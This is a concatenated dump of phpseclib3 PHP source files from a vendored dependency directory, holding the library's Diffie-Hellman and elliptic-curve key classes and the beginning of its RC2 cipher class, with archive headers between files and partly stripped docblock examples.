phpseclib3\Crypt\DH\Parameters; use phpseclib3\Crypt\DH\PrivateKey; use phpseclib3\Crypt\DH\PublicKey; use phpseclib3\Exception\NoKeyLoadedException; use phpseclib3\Exception\UnsupportedOperationException; use phpseclib3\Math\BigInteger; /** * Pure-PHP (EC)DH implementation * * @author Jim Wigginton */ abstract class DH extends AsymmetricKey { /** * Algorithm Name * * @var string */ const ALGORITHM = 'DH'; /** * DH prime * * @var \phpseclib3\Math\BigInteger */ protected $prime; /** * DH Base * * Prime divisor of p-1 * * @var \phpseclib3\Math\BigInteger */ protected $base; /** * Public Key * * @var \phpseclib3\Math\BigInteger */ protected $publicKey; /** * Create DH parameters * * This method is a bit polymorphic. It can take any of the following: * - two BigInteger's (prime and base) * - an integer representing the size of the prime in bits (the base is assumed to be 2) * - a string (eg. diffie-hellman-group14-sha1) * * @return Parameters */ public static function createParameters(...$args) { $class = new \ReflectionClass(static::class); if ($class->isFinal()) { throw new \RuntimeException('createParameters() should not be called from final classes (' . static::class . ')'); } $params = new Parameters(); if (count($args) == 2 && $args[0] instanceof BigInteger && $args[1] instanceof BigInteger) { //if (!$args[0]->isPrime()) { // throw new \InvalidArgumentException('The first parameter should be a prime number'); //} $params->prime = $args[0]; $params->base = $args[1]; return $params; } elseif (count($args) == 1 && is_numeric($args[0])) { $params->prime = BigInteger::randomPrime($args[0]); $params->base = new BigInteger(2); return $params; } elseif (count($args) != 1 || !is_string($args[0])) { throw new \InvalidArgumentException('Valid parameters are either: two BigInteger\'s (prime and base), a single integer (the length of the prime; base is assumed to be 2) or a string'); } switch ($args[0]) { // see http://tools.ietf.org/html/rfc2409#section-6.2 and // http://tools.ietf.org/html/rfc2412, appendex E case 'diffie-hellman-group1-sha1': $prime = 'FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74' . '020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F1437' . '4FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED' . 'EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF'; break; // see http://tools.ietf.org/html/rfc3526#section-3 case 'diffie-hellman-group14-sha1': // 2048-bit MODP Group case 'diffie-hellman-group14-sha256': $prime = 'FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74' . '020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F1437' . '4FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED' . 'EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF05' . '98DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB' . '9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3B' . 'E39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF695581718' . '3995497CEA956AE515D2261898FA051015728E5A8AACAA68FFFFFFFFFFFFFFFF'; break; // see https://tools.ietf.org/html/rfc3526#section-4 case 'diffie-hellman-group15-sha512': // 3072-bit MODP Group $prime = 'FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74' . '020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F1437' . '4FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED' . 'EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF05' . '98DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB' . '9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3B' . 'E39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF695581718' . '3995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33' . 'A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7' . 'ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864' . 'D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E2' . '08E24FA074E5AB3143DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF'; break; // see https://tools.ietf.org/html/rfc3526#section-5 case 'diffie-hellman-group16-sha512': // 4096-bit MODP Group $prime = 'FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74' . '020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F1437' . '4FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED' . 'EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF05' . '98DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB' . '9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3B' . 'E39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF695581718' . '3995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33' . 'A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7' . 'ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864' . 'D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E2' . '08E24FA074E5AB3143DB5BFCE0FD108E4B82D120A92108011A723C12A787E6D7' . '88719A10BDBA5B2699C327186AF4E23C1A946834B6150BDA2583E9CA2AD44CE8' . 'DBBBC2DB04DE8EF92E8EFC141FBECAA6287C59474E6BC05D99B2964FA090C3A2' . '233BA186515BE7ED1F612970CEE2D7AFB81BDD762170481CD0069127D5B05AA9' . '93B4EA988D8FDDC186FFB7DC90A6C08F4DF435C934063199FFFFFFFFFFFFFFFF'; break; // see https://tools.ietf.org/html/rfc3526#section-6 case 'diffie-hellman-group17-sha512': // 6144-bit MODP Group $prime = 'FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74' . '020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F1437' . '4FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED' . 'EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF05' . '98DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB' . '9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3B' . 'E39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF695581718' . '3995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33' . 'A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7' . 'ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864' . 'D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E2' . '08E24FA074E5AB3143DB5BFCE0FD108E4B82D120A92108011A723C12A787E6D7' . '88719A10BDBA5B2699C327186AF4E23C1A946834B6150BDA2583E9CA2AD44CE8' . 'DBBBC2DB04DE8EF92E8EFC141FBECAA6287C59474E6BC05D99B2964FA090C3A2' . '233BA186515BE7ED1F612970CEE2D7AFB81BDD762170481CD0069127D5B05AA9' . '93B4EA988D8FDDC186FFB7DC90A6C08F4DF435C93402849236C3FAB4D27C7026' . 'C1D4DCB2602646DEC9751E763DBA37BDF8FF9406AD9E530EE5DB382F413001AE' . 'B06A53ED9027D831179727B0865A8918DA3EDBEBCF9B14ED44CE6CBACED4BB1B' . 'DB7F1447E6CC254B332051512BD7AF426FB8F401378CD2BF5983CA01C64B92EC' . 'F032EA15D1721D03F482D7CE6E74FEF6D55E702F46980C82B5A84031900B1C9E' . '59E7C97FBEC7E8F323A97A7E36CC88BE0F1D45B7FF585AC54BD407B22B4154AA' . 'CC8F6D7EBF48E1D814CC5ED20F8037E0A79715EEF29BE32806A1D58BB7C5DA76' . 'F550AA3D8A1FBFF0EB19CCB1A313D55CDA56C9EC2EF29632387FE8D76E3C0468' . '043E8F663F4860EE12BF2D5B0B7474D6E694F91E6DCC4024FFFFFFFFFFFFFFFF'; break; // see https://tools.ietf.org/html/rfc3526#section-7 case 'diffie-hellman-group18-sha512': // 8192-bit MODP Group $prime = 'FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74' . '020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F1437' . '4FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED' . 'EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF05' . '98DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB' . '9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3B' . 'E39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF695581718' . '3995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33' . 'A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7' . 'ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864' . 'D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E2' . '08E24FA074E5AB3143DB5BFCE0FD108E4B82D120A92108011A723C12A787E6D7' . '88719A10BDBA5B2699C327186AF4E23C1A946834B6150BDA2583E9CA2AD44CE8' . 'DBBBC2DB04DE8EF92E8EFC141FBECAA6287C59474E6BC05D99B2964FA090C3A2' . '233BA186515BE7ED1F612970CEE2D7AFB81BDD762170481CD0069127D5B05AA9' . '93B4EA988D8FDDC186FFB7DC90A6C08F4DF435C93402849236C3FAB4D27C7026' . 'C1D4DCB2602646DEC9751E763DBA37BDF8FF9406AD9E530EE5DB382F413001AE' . 'B06A53ED9027D831179727B0865A8918DA3EDBEBCF9B14ED44CE6CBACED4BB1B' . 'DB7F1447E6CC254B332051512BD7AF426FB8F401378CD2BF5983CA01C64B92EC' . 'F032EA15D1721D03F482D7CE6E74FEF6D55E702F46980C82B5A84031900B1C9E' . '59E7C97FBEC7E8F323A97A7E36CC88BE0F1D45B7FF585AC54BD407B22B4154AA' . 'CC8F6D7EBF48E1D814CC5ED20F8037E0A79715EEF29BE32806A1D58BB7C5DA76' . 'F550AA3D8A1FBFF0EB19CCB1A313D55CDA56C9EC2EF29632387FE8D76E3C0468' . '043E8F663F4860EE12BF2D5B0B7474D6E694F91E6DBE115974A3926F12FEE5E4' . '38777CB6A932DF8CD8BEC4D073B931BA3BC832B68D9DD300741FA7BF8AFC47ED' . '2576F6936BA424663AAB639C5AE4F5683423B4742BF1C978238F16CBE39D652D' . 'E3FDB8BEFC848AD922222E04A4037C0713EB57A81A23F0C73473FC646CEA306B' . '4BCBC8862F8385DDFA9D4B7FA2C087E879683303ED5BDD3A062B3CF5B3A278A6' . '6D2A13F83F44F82DDF310EE074AB6A364597E899A0255DC164F31CC50846851D' . 'F9AB48195DED7EA1B1D510BD7EE74D73FAF36BC31ECFA268359046F4EB879F92' . '4009438B481C6CD7889A002ED5EE382BC9190DA6FC026E479558E4475677E9AA' . '9E3050E2765694DFC81F56E880B96E7160C980DD98EDD3DFFFFFFFFFFFFFFFFF'; break; default: throw new \InvalidArgumentException('Invalid named prime provided'); } $params->prime = new BigInteger($prime, 16); $params->base = new BigInteger(2); return $params; } /** * Create public / private key pair. * * The rationale for the second parameter is described in http://tools.ietf.org/html/rfc4419#section-6.2 : * * "To increase the speed of the key exchange, both client and server may * reduce the size of their private exponents. It should be at least * twice as long as the key material that is generated from the shared * secret. For more details, see the paper by van Oorschot and Wiener * [VAN-OORSCHOT]." * * $length is in bits * * @param Parameters $params * @param int $length optional * @return DH\PrivateKey */ public static function createKey(Parameters $params, $length = 0) { $class = new \ReflectionClass(static::class); if ($class->isFinal()) { throw new \RuntimeException('createKey() should not be called from final classes (' . static::class . ')'); } $one = new BigInteger(1); if ($length) { $max = $one->bitwise_leftShift($length); $max = $max->subtract($one); } else { $max = $params->prime->subtract($one); } $key = new PrivateKey(); $key->prime = $params->prime; $key->base = $params->base; $key->privateKey = BigInteger::randomRange($one, $max); $key->publicKey = $key->base->powMod($key->privateKey, $key->prime); return $key; } /** * Compute Shared Secret * * @param PrivateKey|EC $private * @param PublicKey|BigInteger|string $public * @return mixed */ public static function computeSecret($private, $public) { if ($private instanceof PrivateKey) { // DH\PrivateKey switch (true) { case $public instanceof PublicKey: if (!$private->prime->equals($public->prime) || !$private->base->equals($public->base)) { throw new \InvalidArgumentException('The public and private key do not share the same prime and / or base numbers'); } return $public->publicKey->powMod($private->privateKey, $private->prime)->toBytes(true); case is_string($public): $public = new BigInteger($public, -256); // fall-through case $public instanceof BigInteger: return $public->powMod($private->privateKey, $private->prime)->toBytes(true); default: throw new \InvalidArgumentException('$public needs to be an instance of DH\PublicKey, a BigInteger or a string'); } } if ($private instanceof EC\PrivateKey) { switch (true) { case $public instanceof EC\PublicKey: $public = $public->getEncodedCoordinates(); // fall-through case is_string($public): $point = $private->multiply($public); switch ($private->getCurve()) { case 'Curve25519': case 'Curve448': $secret = $point; break; default: // according to https://www.secg.org/sec1-v2.pdf#page=33 only X is returned $secret = substr($point, 1, (strlen($point) - 1) >> 1); } /* if (($secret[0] & "\x80") === "\x80") { $secret = "\0$secret"; } */ return $secret; default: throw new \InvalidArgumentException('$public needs to be an instance of EC\PublicKey or a string (an encoded coordinate)'); } } } /** * Load the key * * @param string $key * @param string $password optional * @return AsymmetricKey */ public static function load($key, $password = false) { try { return EC::load($key, $password); } catch (NoKeyLoadedException $e) { } return parent::load($key, $password); } /** * OnLoad Handler * * @return bool */ protected static function onLoad(array $components) { if (!isset($components['privateKey']) && !isset($components['publicKey'])) { $new = new Parameters(); } else { $new = isset($components['privateKey']) ? new PrivateKey() : new PublicKey(); } $new->prime = $components['prime']; $new->base = $components['base']; if (isset($components['privateKey'])) { $new->privateKey = $components['privateKey']; } if (isset($components['publicKey'])) { $new->publicKey = $components['publicKey']; } return $new; } /** * Determines which hashing function should be used * * @param string $hash */ public function withHash($hash) { throw new UnsupportedOperationException('DH does not use a hash algorithm'); } /** * Returns the hash algorithm currently being used * */ public function getHash() { throw new UnsupportedOperationException('DH does not use a hash algorithm'); } /** * Returns the parameters * * A public / private key is only returned if the currently loaded "key" contains an x or y * value. * * @see self::getPublicKey() * @return mixed */ public function getParameters() { $type = DH::validatePlugin('Keys', 'PKCS1', 'saveParameters'); $key = $type::saveParameters($this->prime, $this->base); return DH::load($key, 'PKCS1'); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC.php000064400000032167147600400120020063 0ustar00 * getPublicKey(); * * $plaintext = 'terrafrost'; * * $signature = $private->sign($plaintext); * * echo $public->verify($plaintext, $signature) ? 'verified' : 'unverified'; * ?> * * * @author Jim Wigginton * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt; use phpseclib3\Crypt\Common\AsymmetricKey; use phpseclib3\Crypt\EC\BaseCurves\Montgomery as MontgomeryCurve; use phpseclib3\Crypt\EC\BaseCurves\TwistedEdwards as TwistedEdwardsCurve; use phpseclib3\Crypt\EC\Curves\Curve25519; use phpseclib3\Crypt\EC\Curves\Ed25519; use phpseclib3\Crypt\EC\Curves\Ed448; use phpseclib3\Crypt\EC\Formats\Keys\PKCS1; use phpseclib3\Crypt\EC\Parameters; use phpseclib3\Crypt\EC\PrivateKey; use phpseclib3\Crypt\EC\PublicKey; use phpseclib3\Exception\UnsupportedAlgorithmException; use phpseclib3\Exception\UnsupportedCurveException; use phpseclib3\Exception\UnsupportedOperationException; use phpseclib3\File\ASN1; use phpseclib3\File\ASN1\Maps\ECParameters; use phpseclib3\Math\BigInteger; /** * Pure-PHP implementation of EC. * * @author Jim Wigginton */ abstract class EC extends AsymmetricKey { /** * Algorithm Name * * @var string */ const ALGORITHM = 'EC'; /** * Public Key QA * * @var object[] */ protected $QA; /** * Curve * * @var \phpseclib3\Crypt\EC\BaseCurves\Base */ protected $curve; /** * Signature Format * * @var string */ protected $format; /** * Signature Format (Short) * * @var string */ protected $shortFormat; /** * Curve Name * * @var string */ private $curveName; /** * Curve Order * * Used for deterministic ECDSA * * @var \phpseclib3\Math\BigInteger */ protected $q; /** * Alias for the private key * * Used for deterministic ECDSA. AsymmetricKey expects $x. I don't like x because * with x you have x * the base point yielding an (x, y)-coordinate that is the * public key. But the x is different depending on which side of the equal sign * you're on. It's less ambiguous if you do dA * base point = (x, y)-coordinate. * * @var \phpseclib3\Math\BigInteger */ protected $x; /** * Context * * @var string */ protected $context; /** * Signature Format * * @var string */ protected $sigFormat; /** * Create public / private key pair. * * @param string $curve * @return \phpseclib3\Crypt\EC\PrivateKey */ public static function createKey($curve) { self::initialize_static_variables(); $class = new \ReflectionClass(static::class); if ($class->isFinal()) { throw new \RuntimeException('createKey() should not be called from final classes (' . static::class . ')'); } if (!isset(self::$engines['PHP'])) { self::useBestEngine(); } $curve = strtolower($curve); if (self::$engines['libsodium'] && $curve == 'ed25519' && function_exists('sodium_crypto_sign_keypair')) { $kp = sodium_crypto_sign_keypair(); $privatekey = EC::loadFormat('libsodium', sodium_crypto_sign_secretkey($kp)); //$publickey = EC::loadFormat('libsodium', sodium_crypto_sign_publickey($kp)); $privatekey->curveName = 'Ed25519'; //$publickey->curveName = $curve; return $privatekey; } $privatekey = new PrivateKey(); $curveName = $curve; if (preg_match('#(?:^curve|^ed)\d+$#', $curveName)) { $curveName = ucfirst($curveName); } elseif (substr($curveName, 0, 10) == 'brainpoolp') { $curveName = 'brainpoolP' . substr($curveName, 10); } $curve = '\phpseclib3\Crypt\EC\Curves\\' . $curveName; if (!class_exists($curve)) { throw new UnsupportedCurveException('Named Curve of ' . $curveName . ' is not supported'); } $reflect = new \ReflectionClass($curve); $curveName = $reflect->isFinal() ? $reflect->getParentClass()->getShortName() : $reflect->getShortName(); $curve = new $curve(); if ($curve instanceof TwistedEdwardsCurve) { $arr = $curve->extractSecret(Random::string($curve instanceof Ed448 ? 57 : 32)); $privatekey->dA = $dA = $arr['dA']; $privatekey->secret = $arr['secret']; } else { $privatekey->dA = $dA = $curve->createRandomMultiplier(); } if ($curve instanceof Curve25519 && self::$engines['libsodium']) { //$r = pack('H*', '0900000000000000000000000000000000000000000000000000000000000000'); //$QA = sodium_crypto_scalarmult($dA->toBytes(), $r); $QA = sodium_crypto_box_publickey_from_secretkey($dA->toBytes()); $privatekey->QA = [$curve->convertInteger(new BigInteger(strrev($QA), 256))]; } else { $privatekey->QA = $curve->multiplyPoint($curve->getBasePoint(), $dA); } $privatekey->curve = $curve; //$publickey = clone $privatekey; //unset($publickey->dA); //unset($publickey->x); $privatekey->curveName = $curveName; //$publickey->curveName = $curveName; if ($privatekey->curve instanceof TwistedEdwardsCurve) { return $privatekey->withHash($curve::HASH); } return $privatekey; } /** * OnLoad Handler * * @return bool */ protected static function onLoad(array $components) { if (!isset(self::$engines['PHP'])) { self::useBestEngine(); } if (!isset($components['dA']) && !isset($components['QA'])) { $new = new Parameters(); $new->curve = $components['curve']; return $new; } $new = isset($components['dA']) ? new PrivateKey() : new PublicKey(); $new->curve = $components['curve']; $new->QA = $components['QA']; if (isset($components['dA'])) { $new->dA = $components['dA']; $new->secret = $components['secret']; } if ($new->curve instanceof TwistedEdwardsCurve) { return $new->withHash($components['curve']::HASH); } return $new; } /** * Constructor * * PublicKey and PrivateKey objects can only be created from abstract RSA class */ protected function __construct() { $this->sigFormat = self::validatePlugin('Signature', 'ASN1'); $this->shortFormat = 'ASN1'; parent::__construct(); } /** * Returns the curve * * Returns a string if it's a named curve, an array if not * * @return string|array */ public function getCurve() { if ($this->curveName) { return $this->curveName; } if ($this->curve instanceof MontgomeryCurve) { $this->curveName = $this->curve instanceof Curve25519 ? 'Curve25519' : 'Curve448'; return $this->curveName; } if ($this->curve instanceof TwistedEdwardsCurve) { $this->curveName = $this->curve instanceof Ed25519 ? 'Ed25519' : 'Ed448'; return $this->curveName; } $params = $this->getParameters()->toString('PKCS8', ['namedCurve' => true]); $decoded = ASN1::extractBER($params); $decoded = ASN1::decodeBER($decoded); $decoded = ASN1::asn1map($decoded[0], ECParameters::MAP); if (isset($decoded['namedCurve'])) { $this->curveName = $decoded['namedCurve']; return $decoded['namedCurve']; } if (!$namedCurves) { PKCS1::useSpecifiedCurve(); } return $decoded; } /** * Returns the key size * * Quoting https://tools.ietf.org/html/rfc5656#section-2, * * "The size of a set of elliptic curve domain parameters on a prime * curve is defined as the number of bits in the binary representation * of the field order, commonly denoted by p. Size on a * characteristic-2 curve is defined as the number of bits in the binary * representation of the field, commonly denoted by m. A set of * elliptic curve domain parameters defines a group of order n generated * by a base point P" * * @return int */ public function getLength() { return $this->curve->getLength(); } /** * Returns the current engine being used * * @see self::useInternalEngine() * @see self::useBestEngine() * @return string */ public function getEngine() { if (!isset(self::$engines['PHP'])) { self::useBestEngine(); } if ($this->curve instanceof TwistedEdwardsCurve) { return $this->curve instanceof Ed25519 && self::$engines['libsodium'] && !isset($this->context) ? 'libsodium' : 'PHP'; } return self::$engines['OpenSSL'] && in_array($this->hash->getHash(), openssl_get_md_methods()) ? 'OpenSSL' : 'PHP'; } /** * Returns the public key coordinates as a string * * Used by ECDH * * @return string */ public function getEncodedCoordinates() { if ($this->curve instanceof MontgomeryCurve) { return strrev($this->QA[0]->toBytes(true)); } if ($this->curve instanceof TwistedEdwardsCurve) { return $this->curve->encodePoint($this->QA); } return "\4" . $this->QA[0]->toBytes(true) . $this->QA[1]->toBytes(true); } /** * Returns the parameters * * @see self::getPublicKey() * @param string $type optional * @return mixed */ public function getParameters($type = 'PKCS1') { $type = self::validatePlugin('Keys', $type, 'saveParameters'); $key = $type::saveParameters($this->curve); return EC::load($key, 'PKCS1') ->withHash($this->hash->getHash()) ->withSignatureFormat($this->shortFormat); } /** * Determines the signature padding mode * * Valid values are: ASN1, SSH2, Raw * * @param string $format */ public function withSignatureFormat($format) { if ($this->curve instanceof MontgomeryCurve) { throw new UnsupportedOperationException('Montgomery Curves cannot be used to create signatures'); } $new = clone $this; $new->shortFormat = $format; $new->sigFormat = self::validatePlugin('Signature', $format); return $new; } /** * Returns the signature format currently being used * */ public function getSignatureFormat() { return $this->shortFormat; } /** * Sets the context * * Used by Ed25519 / Ed448. * * @see self::sign() * @see self::verify() * @param string $context optional */ public function withContext($context = null) { if (!$this->curve instanceof TwistedEdwardsCurve) { throw new UnsupportedCurveException('Only Ed25519 and Ed448 support contexts'); } $new = clone $this; if (!isset($context)) { $new->context = null; return $new; } if (!is_string($context)) { throw new \InvalidArgumentException('setContext expects a string'); } if (strlen($context) > 255) { throw new \LengthException('The context is supposed to be, at most, 255 bytes long'); } $new->context = $context; return $new; } /** * Returns the signature format currently being used * */ public function getContext() { return $this->context; } /** * Determines which hashing function should be used * * @param string $hash */ public function withHash($hash) { if ($this->curve instanceof MontgomeryCurve) { throw new UnsupportedOperationException('Montgomery Curves cannot be used to create signatures'); } if ($this->curve instanceof Ed25519 && $hash != 'sha512') { throw new UnsupportedAlgorithmException('Ed25519 only supports sha512 as a hash'); } if ($this->curve instanceof Ed448 && $hash != 'shake256-912') { throw new UnsupportedAlgorithmException('Ed448 only supports shake256 with a length of 114 bytes'); } return parent::withHash($hash); } /** * __toString() magic method * * @return string */ public function __toString() { if ($this->curve instanceof MontgomeryCurve) { return ''; } return parent::__toString(); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/RC2.php000064400000052305147600400120020156 0ustar00 * setKey('abcdefgh'); * * $plaintext = str_repeat('a', 1024); * * echo $rc2->decrypt($rc2->encrypt($plaintext)); * ?> * * * @author Patrick Monnerat * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt; use phpseclib3\Crypt\Common\BlockCipher; use phpseclib3\Exception\BadModeException; /** * Pure-PHP implementation of RC2. * */ class RC2 extends BlockCipher { /** * Block Length of the cipher * * @see \phpseclib3\Crypt\Common\SymmetricKey::block_size * @var int */ protected $block_size = 8; /** * The Key * * @see \phpseclib3\Crypt\Common\SymmetricKey::key * @see self::setKey() * @var string */ protected $key; /** * The Original (unpadded) Key * * @see \phpseclib3\Crypt\Common\SymmetricKey::key * @see self::setKey() * @see self::encrypt() * @see self::decrypt() * @var string */ private $orig_key; /** * Key Length (in bytes) * * @see \phpseclib3\Crypt\RC2::setKeyLength() * @var int */ protected $key_length = 16; // = 128 bits /** * The mcrypt specific name of the cipher * * @see \phpseclib3\Crypt\Common\SymmetricKey::cipher_name_mcrypt * @var string */ protected $cipher_name_mcrypt = 'rc2'; /** * Optimizing value while CFB-encrypting * * @see \phpseclib3\Crypt\Common\SymmetricKey::cfb_init_len * @var int */ protected $cfb_init_len = 500; /** * The key length in bits. * * {@internal Should be in range [1..1024].} * * {@internal Changing this value after setting the key has no effect.} * * @see self::setKeyLength() * @see self::setKey() * @var int */ private $default_key_length = 1024; /** * The key length in bits. * * {@internal Should be in range [1..1024].} * * @see self::isValidEnine() * @see self::setKey() * @var int */ private $current_key_length; /** * The Key Schedule * * @see self::setupKey() * @var array */ private $keys; /** * Key expansion randomization table. * Twice the same 256-value sequence to save a modulus in key expansion. * * @see self::setKey() * @var array */ private static $pitable = [ 0xD9, 0x78, 0xF9, 0xC4, 0x19, 0xDD, 0xB5, 0xED, 0x28, 0xE9, 0xFD, 0x79, 0x4A, 0xA0, 0xD8, 0x9D, 0xC6, 0x7E, 0x37, 0x83, 0x2B, 0x76, 0x53, 0x8E, 0x62, 0x4C, 0x64, 0x88, 0x44, 0x8B, 0xFB, 0xA2, 0x17, 0x9A, 0x59, 0xF5, 0x87, 0xB3, 0x4F, 0x13, 0x61, 0x45, 0x6D, 0x8D, 0x09, 0x81, 0x7D, 0x32, 0xBD, 0x8F, 0x40, 0xEB, 0x86, 0xB7, 0x7B, 0x0B, 0xF0, 0x95, 0x21, 0x22, 0x5C, 0x6B, 0x4E, 0x82, 0x54, 0xD6, 0x65, 0x93, 0xCE, 0x60, 0xB2, 0x1C, 0x73, 0x56, 0xC0, 0x14, 0xA7, 0x8C, 0xF1, 0xDC, 0x12, 0x75, 0xCA, 0x1F, 0x3B, 0xBE, 0xE4, 0xD1, 0x42, 0x3D, 0xD4, 0x30, 0xA3, 0x3C, 0xB6, 0x26, 0x6F, 0xBF, 0x0E, 0xDA, 0x46, 0x69, 0x07, 0x57, 0x27, 0xF2, 0x1D, 0x9B, 0xBC, 0x94, 0x43, 0x03, 0xF8, 0x11, 0xC7, 0xF6, 0x90, 0xEF, 0x3E, 0xE7, 0x06, 0xC3, 0xD5, 0x2F, 0xC8, 0x66, 0x1E, 0xD7, 0x08, 0xE8, 0xEA, 0xDE, 0x80, 0x52, 0xEE, 0xF7, 0x84, 0xAA, 0x72, 0xAC, 0x35, 0x4D, 0x6A, 0x2A, 0x96, 0x1A, 0xD2, 0x71, 0x5A, 0x15, 0x49, 0x74, 0x4B, 0x9F, 0xD0, 0x5E, 0x04, 0x18, 0xA4, 0xEC, 0xC2, 0xE0, 0x41, 0x6E, 0x0F, 0x51, 0xCB, 0xCC, 0x24, 0x91, 0xAF, 0x50, 0xA1, 0xF4, 0x70, 0x39, 0x99, 0x7C, 0x3A, 0x85, 0x23, 0xB8, 0xB4, 0x7A, 0xFC, 0x02, 0x36, 0x5B, 0x25, 0x55, 0x97, 0x31, 0x2D, 0x5D, 0xFA, 0x98, 0xE3, 0x8A, 0x92, 0xAE, 0x05, 0xDF, 0x29, 0x10, 0x67, 0x6C, 0xBA, 0xC9, 0xD3, 0x00, 0xE6, 0xCF, 0xE1, 0x9E, 0xA8, 0x2C, 0x63, 0x16, 0x01, 0x3F, 0x58, 0xE2, 0x89, 0xA9, 0x0D, 0x38, 0x34, 0x1B, 0xAB, 0x33, 0xFF, 0xB0, 0xBB, 0x48, 0x0C, 0x5F, 0xB9, 0xB1, 0xCD, 0x2E, 0xC5, 0xF3, 0xDB, 0x47, 0xE5, 0xA5, 0x9C, 0x77, 0x0A, 0xA6, 0x20, 0x68, 0xFE, 0x7F, 0xC1, 0xAD, 0xD9, 0x78, 0xF9, 0xC4, 0x19, 0xDD, 0xB5, 0xED, 0x28, 0xE9, 0xFD, 0x79, 0x4A, 0xA0, 0xD8, 0x9D, 0xC6, 0x7E, 0x37, 0x83, 0x2B, 0x76, 0x53, 0x8E, 0x62, 0x4C, 0x64, 0x88, 0x44, 0x8B, 0xFB, 0xA2, 0x17, 0x9A, 0x59, 0xF5, 0x87, 0xB3, 0x4F, 0x13, 0x61, 0x45, 0x6D, 0x8D, 0x09, 0x81, 0x7D, 0x32, 0xBD, 0x8F, 0x40, 0xEB, 0x86, 0xB7, 0x7B, 0x0B, 0xF0, 0x95, 0x21, 0x22, 0x5C, 0x6B, 0x4E, 0x82, 0x54, 0xD6, 0x65, 0x93, 0xCE, 0x60, 0xB2, 0x1C, 0x73, 0x56, 0xC0, 0x14, 0xA7, 0x8C, 0xF1, 0xDC, 0x12, 0x75, 0xCA, 0x1F, 0x3B, 0xBE, 0xE4, 0xD1, 0x42, 0x3D, 0xD4, 0x30, 0xA3, 0x3C, 0xB6, 0x26, 0x6F, 0xBF, 0x0E, 0xDA, 0x46, 0x69, 0x07, 0x57, 0x27, 0xF2, 0x1D, 0x9B, 0xBC, 0x94, 0x43, 0x03, 0xF8, 0x11, 0xC7, 0xF6, 